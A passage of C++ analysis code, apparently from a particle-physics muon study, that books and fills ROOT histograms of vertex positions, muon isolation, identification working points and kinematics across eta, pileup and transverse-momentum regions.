Muons; # entries\", 4, 0., 4.);\n\n // Vertices\n for (unsigned int npu=0; npu<4; npu++){\n outFile->mkdir(sampleTag + \"/Vtx/\" + PUr[npu]);\n outFile->cd (sampleTag + \"/Vtx/\" + PUr[npu]);\n // Reco Vertex \n m_plots[PUr[npu]+\"RecoVtx_X\"] = new TH1D (\"RecoVtx_X_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (RECO) ; X [cm]; # entries\", 200, 0., 0.2);\n m_plots[PUr[npu]+\"RecoVtx_Y\"] = new TH1D (\"RecoVtx_Y_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (RECO) ; Y [cm]; # entries\", 200, 0., 0.2);\n m_plots[PUr[npu]+\"RecoVtx_Z\"] = new TH1D (\"RecoVtx_Z_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (RECO) ; Z [cm]; # entries\", 240, 0., 24);\n m_plots[PUr[npu]+\"RecoVtx_XY\"] = new TH1D (\"RecoVtx_XY_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (RECO) ; XY [cm]; # entries\", 400, 0., 0.4);\n // Gen Vertex\n m_plots[PUr[npu]+\"GenVtx_X\"] = new TH1D (\"GenVtx_X_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (GEN) ; X [cm]; # entries\", 200, 0., 0.2);\n m_plots[PUr[npu]+\"GenVtx_Y\"] = new TH1D (\"GenVtx_Y_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (GEN) ; Y [cm]; # entries\", 200, 0., 0.2);\n m_plots[PUr[npu]+\"GenVtx_Z\"] = new TH1D (\"GenVtx_Z_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (GEN) ; Z [cm]; # entries\", 240, 0., 24);\n m_plots[PUr[npu]+\"GenVtx_XY\"] = new TH1D (\"GenVtx_XY_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position (GEN) ; XY [cm]; # entries\", 400, 0., 0.4);\n // Delta Vertex (Reco-Gen)\n m_plots[PUr[npu]+\"Vtx_DX\"] = new TH1D (\"Vtx_DX_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position ; #Delta X [cm]; # entries\", 100, 0., 0.01);\n m_plots[PUr[npu]+\"Vtx_DY\"] = new TH1D (\"Vtx_DY_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position ; #Delta Y [cm]; # entries\", 100, 0., 0.01);\n m_plots[PUr[npu]+\"Vtx_DZ\"] = new TH1D (\"Vtx_DZ_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position ; #Delta Z [cm]; # entries\", 240, 0., 24);\n m_plots[PUr[npu]+\"Vtx_DXY\"] = new TH1D (\"Vtx_DXY_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position ; #Delta XY [cm]; # entries\", 100, 0., 0.01);\n // Delta Vertex (Reco-Gen)\n m_2Dplots[PUr[npu]+\"Vtx_DXVsDY\"] = new TH2D (\"Vtx_DXVsDY_\" + PUr[npu], \"PU:\" + PUr[npu] + \" Vertex position ; #Delta X [cm]; #Delta Y [cm]\", 100, 0., 0.01, 100, 0., 0.01);\n\n } // for(npu) \n \n for (unsigned int nid=0; nid<IDName.size(); nid++){\n outFile->mkdir(sampleTag + \"/KinIso_variables/\" + IDName[nid]);\n for (unsigned int nre=0; nre<region.size(); nre++){\n outFile->mkdir(sampleTag + \"/KinIso_variables/\" + IDName[nid] + \"/\" + region[nre]);\n for (unsigned int npu=0; npu<PUr.size(); npu++){\n\toutFile->mkdir(sampleTag + \"/KinIso_variables/\" + IDName[nid] + \"/\" + region[nre] + \"/\" + PUr[npu]);\n\toutFile->cd (sampleTag + \"/KinIso_variables/\" + IDName[nid] + \"/\" + region[nre] + \"/\" + PUr[npu]);\n\tfor (unsigned int npT=0; npT<pTr.size(); npT++){\n\t outFile->mkdir(sampleTag + \"/KinIso_variables/\" + IDName[nid] + \"/\" + region[nre] + \"/\" + PUr[npu] + \"/\" + pTr[npT]);\n\t outFile->cd (sampleTag + \"/KinIso_variables/\" + IDName[nid] + \"/\" + region[nre] + \"/\" + PUr[npu] + \"/\" + pTr[npT]);\n\t \n\t TString IDReg = IDName[nid] + region[nre] + PUr[npu] + pTr[npT];\n\t TString IDRegName = IDName[nid] + \"_\" + region[nre] + \"_\" + PUr[npu] + \"_\" + pTr[npT];\n\t TString IDRegTitle = \"ID:\" + IDName[nid] + \" - REGION:\" + region[nre] + \" - PU:\" + PUr[npu] + \" - pT:\" + pTr[npT];\n\t \n\t m_prof[IDReg+\"dXYVsPt\"] = new 
TProfile(\"dXYVsPt_\" + IDRegName, IDRegTitle + \" #Delta XY Vs Pt ; #Delta XY; p_{T} [GeV]\", 200, 0, 2. , 0., 100.);\n\t m_prof[IDReg+\"dZVsPt\"] = new TProfile(\"dZVsPt_\" + IDRegName, IDRegTitle + \" #Delta Z Vs Pt ; #Delta Z; p_{T} [GeV]\" , 200, 0, 2. , 0., 100.);\n\t m_prof[IDReg+\"PtVsdXY\"] = new TProfile(\"PtVsdXY_\" + IDRegName, IDRegTitle + \" Pt Vs #Delta XY ; p_{T} [GeV]; #Delta XY [cm]\", 100,0., 100, 0., 2.);\n\t m_prof[IDReg+\"PtVsdZ\"] = new TProfile(\"PtVsdZ_\" + IDRegName, IDRegTitle + \" Pt Vs #Delta Z ; p_{T} [GeV]; #Delta Z [cm]\", 100,0., 100, 0., 2.);\n\t m_prof[IDReg+\"PtVsVtx\"] = new TProfile(\"PtVsVtx_\" + IDRegName, IDRegTitle + \" Pt Vs #Vtx ; p_{T} [GeV]; N. Vtx\", 100,0., 100, 0., 60.);\n\n\t m_2Dplots[IDReg+\"PtVspdgID\"] = new TH2D(\"PtVspdgID_\" + IDRegName, IDRegTitle + \" Pt Vs PDG ID ; p_{T} [GeV]; Particle ID\", 100,0., 100, 1000, -1., 999.);\n\n\t m_plots[IDReg+\"NumGenJets\"] = new TH1D (\"NGenJets_\" + IDRegName, IDRegTitle + \" Number of GEN Jets ; GEN-Jets Multiplicity; # entries\", 7, -0.5, 6.5);\n\t\n\n\t for (unsigned int nISO=0; nISO<IsoName.size(); nISO++){\n\t outFile->mkdir(sampleTag + \"/KinIso_variables/\" + IDName[nid] + \"/\" + region[nre] + \"/\" + PUr[npu] + \"/\" + pTr[npT] + \"/\" + IsoName[nISO]);\n\t outFile->cd (sampleTag + \"/KinIso_variables/\" + IDName[nid] + \"/\" + region[nre] + \"/\" + PUr[npu] + \"/\" + pTr[npT] + \"/\" + IsoName[nISO]);\n\t \n\t IDReg = IDName[nid] + region[nre] + PUr[npu] + pTr[npT] + IsoName[nISO];\n\t IDRegName = IDName[nid] + \"_\" + region[nre] + \"_\" + PUr[npu] + \"_\" + pTr[npT] + \"_\" + IsoName[nISO];\n\t IDRegTitle = \"ID:\" + IDName[nid] + \" - REGION:\" + region[nre] + \" - PU:\" + PUr[npu] + \" - pT:\" + pTr[npT] + \" - ISO:\" + IsoName[nISO];\n\t \n\t m_plots[IDReg+\"ChHadIso\"] = new TH1D (\"ChHadIso_\" + IDRegName, IDRegTitle + \" Charged Hadron Isolation ; Charged Had. Iso.; # entries\", 40, 0., 10);\n\t m_plots[IDReg+\"NeHadIso\"] = new TH1D (\"NeHadIso_\" + IDRegName, IDRegTitle + \" Neutral Hadron Isolation ; Neutral Had. Iso.; # entries\", 40, 0., 10);\n\t m_plots[IDReg+\"PhIso\"] = new TH1D (\"PhIso_\" + IDRegName, IDRegTitle + \" Photon Isolation ; Photon Iso.; # entries\", 40, 0., 60);\n\t m_plots[IDReg+\"PUIso\"] = new TH1D (\"PUIso_\" + IDRegName, IDRegTitle + \" PU Isolation ; PU Iso.; # entries\", 40, 0., 60);\n\n\t m_prof[IDReg+\"VtxVsChHadIso\"] = new TProfile(\"VtxVsChHadIso_\" + IDRegName, IDRegTitle + \" Vtx Vs Charged Hadron Isolation ; N. Vtx; Charged Had. Iso.\", 60, 0., 60., 0., 10.);\n\t m_prof[IDReg+\"VtxVsNeHadIso\"] = new TProfile(\"VtxVsNeHadIso_\" + IDRegName, IDRegTitle + \" Vtx Vs Neutral Hadron Isolation ; N. Vtx; Neutral Had. Iso.\", 60, 0., 60., 0., 10.); \n\t m_prof[IDReg+\"VtxVsPhIso\"] = new TProfile(\"VtxVsPhIso_\" + IDRegName, IDRegTitle + \" Vtx Vs Photon Isolation ; N. Vtx; Photon Iso.\", 60, 0., 60., 0., 60.);\n\t m_prof[IDReg+\"VtxVsPUIso\"] = new TProfile(\"VtxVsPUIso_\" + IDRegName, IDRegTitle + \" Vtx Vs PU Isolation ; N. Vtx; PU Iso.\", 60, 0., 60., 0., 60.);\n\t \n\t m_plots[IDReg+\"TotalIso\"] = new TH1D (\"TotalIso_\" + IDRegName, IDRegTitle + \" Total Isolation ; Total Iso.; # entries\", 100, 0., 200);\n\t m_prof[IDReg+\"VtxVsTotalIso\"] = new TProfile(\"VtxVsTotalIso_\" + IDRegName, IDRegTitle + \" Vtx Vs Total Isolation ; N. 
Vtx; Total Iso.\", 60, 0., 60., 0., 200.);\n\t m_prof[IDReg+\"PtVsTotalIso\"] = new TProfile(\"PtVsTotalIso_\" + IDRegName, IDRegTitle + \" Pt Vs Total Isolation ; p_{T} [GeV]; Total Iso.\", 100,0., 100, 0., 200.);\n\t m_prof[IDReg+\"EtaVsTotalIso\"] = new TProfile(\"EtaVsTotalIso_\" + IDRegName, IDRegTitle + \" Eta Vs Total Isolation ; #eta; Total Iso.\", 48, -2.4, 2.4, 0., 200.);\n\t m_prof[IDReg+\"NumGenJetsVsTotalIso\"] = new TProfile(\"NGenJetsVsTotalIso_\" + IDRegName, IDRegTitle + \" Number of GenJets Vs Total Isolation ; GEN-Jets Multiplicity; Total Iso.\", 7, -0.5, 6.5, 0., 200.);\n\n\t m_plots[IDReg+\"TotalIsoNoDB\"] = new TH1D (\"TotalIsoNoDB_\" + IDRegName, IDRegTitle + \" Total Isolation w/o #Delta#beta ; Total Iso. (No #Delta#beta); # entries\", 100, 0., 200);\n\t m_prof[IDReg+\"VtxVsTotalIsoNoDB\"] = new TProfile(\"VtxVsTotalIsoNoDB_\" + IDRegName, IDRegTitle + \" Vtx Vs Total Isolation w/o #Delta#beta ; N. Vtx; Total Iso. (No #Delta#beta)\", 60, 0., 60., 0., 200.);\n\t m_prof[IDReg+\"PtVsTotalIsoNoDB\"] = new TProfile(\"PtVsTotalIsoNoDB_\" + IDRegName, IDRegTitle + \" Pt Vs Total Isolation w/o #Delta#beta ; p_{T} [GeV]; Total Iso. (No #Delta#beta)\", 100,0., 100, 0., 200.);\n\t m_prof[IDReg+\"EtaVsTotalIsoNoDB\"] = new TProfile(\"EtaVsTotalIsoNoDB_\" + IDRegName, IDRegTitle + \" Eta Vs Total Isolation w/o #Delta#beta ; #eta; Total Iso. (No #Delta#beta)\", 48, -2.4, 2.4, 0., 200.);\n\t m_prof[IDReg+\"NumGenJetsVsTotalIsoNoDB\"] = new TProfile(\"NGenJetsVsTotalIsoNoDB_\" + IDRegName, IDRegTitle + \" Number of GenJets Vs Total Isolation ; GEN-Jets Multiplicity; Total Iso. (No #Delta#beta)\", 7, -0.5, 6.5, 0., 200.);\n\n\t m_plots[IDReg+\"RelIso\"] = new TH1D (\"RelIso_\" + IDRegName, IDRegTitle + \" Relative Isolation ; Relative Iso.; # entries\", 100, 0., 1.);\n\t m_prof[IDReg+\"VtxVsRelIso\"] = new TProfile(\"VtxVsRelIso_\" + IDRegName, IDRegTitle + \" Vtx Vs Relative Isolation ; N. Vtx; Relative Iso.\", 60, 0., 60., 0., 1.);\n\t m_prof[IDReg+\"PtVsRelIso\"] = new TProfile(\"PtVsRelIso_\" + IDRegName, IDRegTitle + \" Pt Vs Relative Isolation ; p_{T} [GeV]; Relative Iso.\", 100,0., 100, 0., 1.);\n\t m_prof[IDReg+\"EtaVsRelIso\"] = new TProfile(\"EtaVsRelIso_\" + IDRegName, IDRegTitle + \" Eta Vs Relative Isolation ; #eta; Relative Iso.\", 48, -2.4, 2.4, 0., 1.);\n\t m_prof[IDReg+\"dXYVsRelIso\"] = new TProfile(\"dXYVsRelIso_\" + IDRegName, IDRegTitle + \" #Delta XY Vs Relative Isolation ; #Delta XY; Relative Iso.\", 200, 0, 2. , 0., 1.);\n\t m_prof[IDReg+\"dZVsRelIso\"] = new TProfile(\"dZVsRelIso_\" + IDRegName, IDRegTitle + \" #Delta Z Vs Relative Isolation ; #Delta Z; Relative Iso.\", 200, 0, 2. , 0., 1.);\n\t m_prof[IDReg+\"NumGenJetsVsRelIso\"] = new TProfile(\"NGenJetsVsRelIso_\" + IDRegName, IDRegTitle + \" Number of GenJets Vs Relative Isolation ; GEN-Jets Multiplicity; Relative Iso.\", 7, -0.5, 6.5, 0., 1.);\n\n\t m_plots[IDReg+\"RelIsoNoDB\"] = new TH1D (\"RelIsoNoDB_\" + IDRegName, IDRegTitle + \" Relative Isolation w/o #Delta#beta ; Relative Iso. (No #Delta#beta); # entries\", 100, 0., 2.);\n\t m_prof[IDReg+\"VtxVsRelIsoNoDB\"] = new TProfile(\"VtxVsRelIsoNoDB_\" + IDRegName, IDRegTitle + \" Vtx Vs Relative Isolation w/o #Delta#beta ; N. Vtx; Relative Iso. (No #Delta#beta)\", 60, 0., 60., 0., 1.);\n\t m_prof[IDReg+\"PtVsRelIsoNoDB\"] = new TProfile(\"PtVsRelIsoNoDB_\" + IDRegName, IDRegTitle + \" Pt Vs Relative Isolation w/o #Delta#beta ; p_{T} [GeV]; Relative Iso. 
(No #Delta#beta)\", 100,0., 100, 0., 1.);\n\t m_prof[IDReg+\"EtaVsRelIsoNoDB\"] = new TProfile(\"EtaVsRelIsoNoDB_\" + IDRegName, IDRegTitle + \" Eta Vs Relative Isolation w/o #Delta#beta ; #eta; Relative Iso. (No #Delta#beta)\", 48, -2.4, 2.4, 0., 1.);\n\t m_prof[IDReg+\"dXYVsRelIsoNoDB\"] = new TProfile(\"dXYVsRelIsoNoDB_\" + IDRegName, IDRegTitle + \" #Delta XY Vs Relative Isolation w/o #Delta#beta ; #Delta XY; Relative Iso.\", 200, 0, 2. , 0., 1.);\n\t m_prof[IDReg+\"dZVsRelIsoNoDB\"] = new TProfile(\"dZVsRelIsoNoDB_\" + IDRegName, IDRegTitle + \" #Delta Z Vs Relative Isolation w/o #Delta#beta ; #Delta Z; Relative Iso.\", 200, 0, 2. , 0., 1.);\n\t m_prof[IDReg+\"NumGenJetsVsRelIsoNoDB\"] = new TProfile(\"NGenJetsVsRelIsoNoDB_\" + IDRegName, IDRegTitle + \" Number of GenJets Vs Relative Isolation w/o #Delta#beta ; GEN-Jets Multiplicity; Relative Iso.\", 7, -0.5, 6.5, 0., 1.);\n\t \n\t \n\t m_plots[IDReg+\"RelIsoCut\"] = new TH1D (\"RelIsoCut_\" + IDRegName, IDRegTitle + \" Relative Isolation Cut ; Relative Iso. Cut; # entries\", 101, 0., 1.01);\n\t \n\t for (unsigned int nISOcut=0; nISOcut<isowp[nISO].size(); nISOcut++){\n\t \n\t IDReg = IDName[nid] + region[nre] + PUr[npu] + pTr[npT] + IsoName[nISO] + isowp[nISO][nISOcut];\n\t IDRegName = IDName[nid] + \"_\" + region[nre] + \"_\" + PUr[npu] + \"_\" + pTr[npT] + \"_\" + IsoName[nISO] + \"_\" + isowp[nISO][nISOcut];\n\t IDRegTitle = \"ID:\" + IDName[nid] + \" - REGION:\" + region[nre] + \" - PU:\" + PUr[npu] + \" - pT:\" + pTr[npT] + \" - ISO:\" + IsoName[nISO] + \" - ISOWP:\" + isowp[nISO][nISOcut];\n\t \n\t m_plots[IDReg+\"NMuons\"] = new TH1D (\"NMuons_\" + IDRegName, IDRegTitle + \" Number of Muons per Evt ; N. Muons; # entries\", 4, 0., 4.);\n\t \n\t m_plots[IDReg+\"Vtx\"] = new TH1D (\"Vtx_\" + IDRegName, IDRegTitle + \" Vtx ; N. Vtx; # entries\", 60, 0., 60.);\n\t m_plots[IDReg+\"Pt\"] = new TH1D (\"Pt_\" + IDRegName, IDRegTitle + \" Pt ; p_{T} [GeV]; # entries\", 100,0., 100);\n\t m_plots[IDReg+\"Eta\"] = new TH1D (\"Eta_\" + IDRegName, IDRegTitle + \" Eta ; #eta; # entries\", 48, -2.4, 2.4);\n\t m_plots[IDReg+\"dXY\"] = new TH1D (\"dXY_\" + IDRegName, IDRegTitle + \" #Delta XY ; #Delta XY; # entries\", 200, 0, 2.);\n\t m_plots[IDReg+\"dZ\"] = new TH1D (\"dZ_\" + IDRegName, IDRegTitle + \" #Delta Z ; #Delta Z; # entries\", 200, 0, 2.);\n\t \n\t m_plots[IDReg+\"NumGenJets\"] = new TH1D (\"NGenJets_\" + IDRegName, IDRegTitle + \" Number of GEN Jets ; GEN-Jets Multiplicity; # entries\", 7, -0.5, 6.5);\n\t \t \n\t }// for(nISOcut)\n\t }// for(nISO)\n\t}// for(npT)\n }// for(npu)\n } // for(nre)\n } // for(nid)\n\n std::cout << \"All histograms have been created.\" << std::endl;\n \n} // void::book \n\nvoid muon_pog::Plotter::fillGen(const std::vector<muon_pog::GenParticle> & genpars, const muon_pog::Event & ev){\n\n // N. 
Muons\n int NmuonFromZ = 0;\n int NmuonOther = 0;\n \n float etaBarrel = 1.2; \n float pTeta = 20.0;\n \n // Number of Events \n m_2Dyields[\"GenMuon\"]->Fill(0.,0.);\n\n for (auto & genpar : genpars){\n\n if(abs(genpar.pdgId) == 13 &&\n genpar.pt > m_tnpConfig.probe_minPt &&\n fabs(genpar.eta) < 2.4 ){\n \n bool genZmuon = false;\n \n // Check this with flags!!!!\n if (hasMother(genpar, 13)) continue;\n \n // Z_id = 23\n genZmuon = hasMother(genpar, 23);\n \n for (unsigned int nre = 0; nre<4; nre++){\n\t\n\tbool etaRegion = false;\n\tif (nre == 0) etaRegion = true;\n\tif (nre == 1 && std::abs(genpar.eta) < etaBarrel) etaRegion = true;\n\tif (nre == 2 && std::abs(genpar.eta) >= etaBarrel) etaRegion = true;\n\tif (nre == 3 && (std::abs(genpar.eta) > 0.9 && std::abs(genpar.eta) < 1.3)) etaRegion = true;\n\t\n\tif (!etaRegion) continue;\n\t\n\tif (genZmuon) m_2Dyields[\"GenMuon\"]->Fill(1,nre); // From Z\n\telse m_2Dyields[\"GenMuon\"]->Fill(2,nre); \n\tm_2Dyields[\"GenMuon\"]->Fill(3,nre); // Number of GenMuons\n\t\n }// for(nre)\n \n if (genZmuon) NmuonFromZ++;\n else NmuonOther++;\n\n }//if(GenMuon)\n \n }// for(genpar) \n\n m_plots[\"NumberOfGenMuonsFromZ\"]->Fill(NmuonFromZ);\n m_plots[\"NumberOfGenMuonsOther\"]->Fill(NmuonOther);\n \n}\n \nvoid muon_pog::Plotter::fill(const std::vector<muon_pog::Muon> & muons,\n\t\t\t const muon_pog::HLT & hlt, const muon_pog::Event & ev, float weight)\n{\n\n // Total Number of Events \n m_2Dyields[\"RecoMuon\"]->Fill(IDName.size()+2.5, 0., weight);\n\n // Primary Vertices: Reco and from GenParticles\n std::vector<bool> IsPURegime;\n for (int bnpu = 0; bnpu<PUr.size(); bnpu++) IsPURegime.push_back( false );\n IsPURegime[FullPU] = true;\n IsPURegime[LowPU] = (ev.nVtx < 10);\n IsPURegime[MediumPU] = (ev.nVtx >= 10 && ev.nVtx < 35);\n IsPURegime[HighPU] = (ev.nVtx >= 35);\n\n TVector3 RecoVtx;\n RecoVtx.SetXYZ(ev.primaryVertex[0],ev.primaryVertex[1],ev.primaryVertex[2]);\n\n TVector3 GenVtx;\n bool FPrPar = true;\n for (auto & genpar : ev.genParticles){\n if(genpar.flags.at(7) == 1 && FPrPar){ // Flag 7: IsHardProcess\n GenVtx.SetXYZ(genpar.vx,genpar.vy,genpar.vz); \n FPrPar = false;\n } // if(flag == 7)\n } // for(genpar)\n \n for (unsigned int npu = 0; npu<PUr.size(); npu++){\n \n if (!IsPURegime[npu]) continue;\n\n m_plots[PUr[npu]+\"RecoVtx_X\"] -> Fill(RecoVtx.X(), weight);\n m_plots[PUr[npu]+\"RecoVtx_Y\"] -> Fill(RecoVtx.Y(), weight);\n m_plots[PUr[npu]+\"RecoVtx_Z\"] -> Fill(RecoVtx.Z(), weight);\n m_plots[PUr[npu]+\"RecoVtx_XY\"] -> Fill(RecoVtx.XYvector().Mod(), weight);\n \n m_plots[PUr[npu]+\"GenVtx_X\"] -> Fill(GenVtx.X(), weight);\n m_plots[PUr[npu]+\"GenVtx_Y\"] -> Fill(GenVtx.Y(), weight);\n m_plots[PUr[npu]+\"GenVtx_Z\"] -> Fill(GenVtx.Z(), weight);\n m_plots[PUr[npu]+\"GenVtx_XY\"] -> Fill(GenVtx.XYvector().Mod(), weight);\n \n m_plots[PUr[npu]+\"Vtx_DX\"] -> Fill(std::abs(RecoVtx.X() - GenVtx.X()), weight);\n m_plots[PUr[npu]+\"Vtx_DY\"] -> Fill(std::abs(RecoVtx.Y() - GenVtx.Y()), weight);\n m_plots[PUr[npu]+\"Vtx_DZ\"] -> Fill(std::abs(RecoVtx.Z() - GenVtx.Z()), weight);\n m_plots[PUr[npu]+\"Vtx_DXY\"] -> Fill(std::abs(RecoVtx.XYvector().Mod() - GenVtx.XYvector().Mod()), weight);\n \n m_2Dplots[PUr[npu]+\"Vtx_DXVsDY\"] -> Fill(std::abs(RecoVtx.X() - GenVtx.X()), std::abs(RecoVtx.Y() - GenVtx.Y()), weight);\n\n } // for(npu)\n\n // Number of GEN-Jets\n int NGenJets = ev.genjets.size();\n\n // Number of muons\n std::map<TString, int> number;\n // -- Initialization\n number[\"muons\"] = 0;\n for (unsigned int mid = 0; mid<IDName.size(); 
mid++)\n for (unsigned int nre = 0; nre<region.size(); nre++)\n for (unsigned int npu = 0; npu<PUr.size(); npu++)\n \tfor (unsigned int npT = 0; npT<pTr.size(); npT++)\t \n \t for(unsigned int iISO=0; iISO < IsoName.size(); iISO++)\n \t for(unsigned int isocat=0; isocat<isowp[iISO].size(); isocat++){\n \t TString iname = IDName[mid]+region[nre]+PUr[npu]+pTr[npT]+IsoName[iISO]+isowp[iISO][isocat]; \n \t number[iname+\"muons\"]=0;\n \t }\n \n // Muon General Cuts\n float etaBarrel = 1.2; \n float pTeta = 20.0;\n \n float DBfactor = m_tnpConfig.iso_DeltaBeta;\n\n // Isolation Cuts from config file\n std::vector< std::vector<float> > iISOwpFromUser; \n iISOwpFromUser.push_back({9999, m_tnpConfig.iso_LooseWP, m_tnpConfig.iso_TightWP});\n iISOwpFromUser.push_back({m_tnpConfig.isoPUPPI_LooseWP, m_tnpConfig.isoPUPPI_TightWP});\n iISOwpFromUser.push_back({m_tnpConfig.isoPUPPILep_LooseWP, m_tnpConfig.isoPUPPILep_TightWP});\n iISOwpFromUser.push_back({m_tnpConfig.isoPUPPINoLep_LooseWP, m_tnpConfig.isoPUPPINoLep_TightWP});\n iISOwpFromUser.push_back({m_tnpConfig.Miniiso_LooseWP, m_tnpConfig.Miniiso_TightWP});\n \n //---------------------------------------\n // PV comparison wrt the HP position ---\n //---------------------------------------\n // if( std::abs(RecoVtx.XYvector().Mod() - GenVtx.XYvector().Mod()) < 0.001 &&\n // std::abs(RecoVtx.Z() - GenVtx.Z()) < 5.0 ){\n\n for (auto & muon : muons){\n \n // Muons/Evt\n number[\"muons\"]++;\n\n // Total Number of Muons\n m_2Dyields[\"RecoMuon\"]->Fill(IDName.size()+1.5, 0., weight);\n \n // General Probe Muons\t \n if(muon.pt > m_tnpConfig.probe_minPt && \n fabs(muon.eta) < 2.4){\n\n // Number of Muons Passing (pT,eta) cuts\n m_2Dyields[\"RecoMuon\"]->Fill(IDName.size()+0.5, 0., weight);\n \n float dXY = std::abs(muon.dxyBest); \n float dZ = std::abs(muon.dzBest);\n\n bool IsSIGN = false;\n \n // ------- OLD ------- \n // Check first if muon comes from Z\n // Check \"hasGenMatch\" and \"hasNoGenMatch\"\n // IsSIGN = muon_pog::hasGenMatch(muon, ev.genParticles, m_tnpConfig.gen_DrCut, 23);\n\n // ------- NEW ------- \n // Check the SIMHit info\n IsSIGN = muon.IsMatchedPrimaryMuon;\n\n bool FillMuon = false;\n TString sampleTag = m_sampleConfig.sampleName;\n // Only prompt muons from signal\n if(sampleTag.Contains(\"SIGNAL\") && IsSIGN) FillMuon = true;\n // All events from QCD samples\n if(sampleTag.Contains(\"BACKGROUND\")) FillMuon = true;\n\n if (!FillMuon) continue;\n \n // Muon mother \n // ------- OLD ------- \n // int GenMatchMotherID = MotherGenMatch(muon, ev.genParticles, m_tnpConfig.gen_DrCut); // OLD Approach\n // ------- NEW ------- \n int GenMatchMotherID = muon.SimmotherPdgId; // New Approach: SIMHit Matching\n \n\n std::vector<bool> IsMuonID;\n for (int bmid = 0; bmid<IDName.size(); bmid++) IsMuonID.push_back( false );\n // New Selectors From MiniAOD\n IsMuonID[BinType::GLB] = muon.isGlobal ; \n IsMuonID[BinType::TRK] = muon.isTracker ; \n IsMuonID[BinType::LOOSE] = muon.Sel_CutBasedIdLoose ; \n IsMuonID[BinType::MEDIUM] = muon.Sel_CutBasedIdMedium ; \n IsMuonID[BinType::TIGHT] = muon.Sel_CutBasedIdTight ; \n IsMuonID[BinType::SOFT] = muon.Sel_SoftCutBasedId ; \n IsMuonID[BinType::HIGHpT] = muon.Sel_CutBasedIdGlobalHighPt ; \n IsMuonID[BinType::MEDIUMPrompt] = muon.Sel_CutBasedIdMediumPrompt ; \n IsMuonID[BinType::MVALOOSE] = muon.Sel_MvaLoose ; \n IsMuonID[BinType::MVAMEDIUM] = muon.Sel_MvaMedium ; \n IsMuonID[BinType::MVATIGHT] = muon.Sel_MvaTight ; \n\n std::vector<bool> IsEtaRegion;\n for (int bnre = 0; bnre<region.size(); bnre++) 
bnre++) 
IsEtaRegion.push_back( false );\n IsEtaRegion[BinRegion::Full] = true;\n IsEtaRegion[BinRegion::Barrel] = (std::abs(muon.eta) < etaBarrel);\n IsEtaRegion[BinRegion::Endcap] = (std::abs(muon.eta) >= etaBarrel);\n IsEtaRegion[BinRegion::Overlap] = ((std::abs(muon.eta) > 0.9 && std::abs(muon.eta) < 1.3));\n\n std::vector<bool> IspTRegime;\n for (int bnre = 0; bnre<pTr.size(); bnre++) IspTRegime.push_back( false );\n IspTRegime[BinpTr::FullpT] = true;\n IspTRegime[BinpTr::LowpT] = (muon.pt < 20.);\n IspTRegime[BinpTr::MediumpT] = (muon.pt >= 20. && muon.pt< 50.);\n IspTRegime[BinpTr::HighpT] = (muon.pt >= 50. );\n\n for (unsigned int mid = 0; mid<IDName.size(); mid++){\n\n\tif (!IsMuonID[mid]) continue;\n\n\tfor (unsigned int nre = 0; nre<region.size(); nre++){\n\t \n\t if (!IsEtaRegion[nre]) continue;\n\t \n\t m_2Dyields[\"RecoMuon\"]->Fill(mid, nre, weight);\t \n\t \n\t for (unsigned int npu = 0; npu<PUr.size(); npu++){\n\t \n\t if (!IsPURegime[npu]) continue;\n\n\t for (unsigned int npT = 0; npT<pTr.size(); npT++){\n\t \n\t if (!IspTRegime[npT]) continue;\n\t \n\t TString HNameRef = IDName[mid]+region[nre]+PUr[npu]+pTr[npT];\n\t \n\t m_prof[HNameRef+\"dXYVsPt\"] ->Fill(dXY, muon.pt, weight);\n\t m_prof[HNameRef+\"dZVsPt\"] ->Fill(dZ, muon.pt, weight);\n\t \n\t m_prof[HNameRef+\"PtVsdXY\"] ->Fill(muon.pt, dXY, weight);\n\t m_prof[HNameRef+\"PtVsdZ\"] ->Fill(muon.pt, dZ, weight);\n\t \n\t m_prof[HNameRef+\"PtVsVtx\"] ->Fill(muon.pt, ev.nVtx, weight);\n\t \n\t m_2Dplots[HNameRef+\"PtVspdgID\"]->Fill(muon.pt, GenMatchMotherID, weight);\n\n\t m_plots[HNameRef+\"NumGenJets\"] ->Fill(NGenJets, weight);\n\n\t std::vector<float> ChHadIso, NeHadIso, PhIso, ChPUIso;\n\t std::vector<float> TotalIso, TotalIsoNoDB, RelIso, RelIsoNoDB;\n\t // Isolation (R=0.4)\n\t ChHadIso.push_back(muon.chargedHadronIso);\n\t NeHadIso.push_back(muon.neutralHadronIso);\n\t PhIso.push_back (muon.photonIso);\n\t ChPUIso.push_back (muon.chargedHadronIsoPU);\t \t \n\t // PUPPI \n\t ChHadIso.push_back(muon.PUPPIIsoCH);\n\t NeHadIso.push_back(muon.PUPPIIsoNH);\n\t PhIso.push_back (muon.PUPPIIsoPH);\n\t ChPUIso.push_back (0.0);\n\t // PUPPI Lep\n\t ChHadIso.push_back(0.0);\n\t NeHadIso.push_back(0.0);\n\t PhIso.push_back (0.0);\n\t ChPUIso.push_back (0.0);\n\t // PUPPI NoLep\n\t ChHadIso.push_back(0.0);\n\t NeHadIso.push_back(0.0);\n\t PhIso.push_back (0.0);\n\t ChPUIso.push_back (0.0);\n\t // Mini-Isolation\n\t ChHadIso.push_back(muon.MiniIsoCH);\n\t NeHadIso.push_back(muon.MiniIsoNH);\n\t PhIso.push_back (muon.MiniIsoPH);\n\t ChPUIso.push_back (muon.MiniIsoPU);\n\t \n\t // --Total Isolations\n\t for(unsigned int iISO=0; iISO < IsoName.size(); iISO++){\n\t\tfloat iIso = ChHadIso[iISO] + std::max(0., NeHadIso[iISO] + PhIso[iISO] - 1.0*DBfactor*ChPUIso[iISO]);\n\t\tfloat iIsoNoDB = ChHadIso[iISO] + NeHadIso[iISO] + PhIso[iISO];\n\n\t\tif(iISO == BinIsoName::ISOPUPPILep){\n\t\t iIso = muon.PUPPILepIso;\n\t\t iIsoNoDB = muon.PUPPILepIso;\n\t\t}\n\t\t\n\t\tif(iISO == BinIsoName::ISOPUPPINoLep){\n\t\t iIso = muon.PUPPINoLepIso;\n\t\t 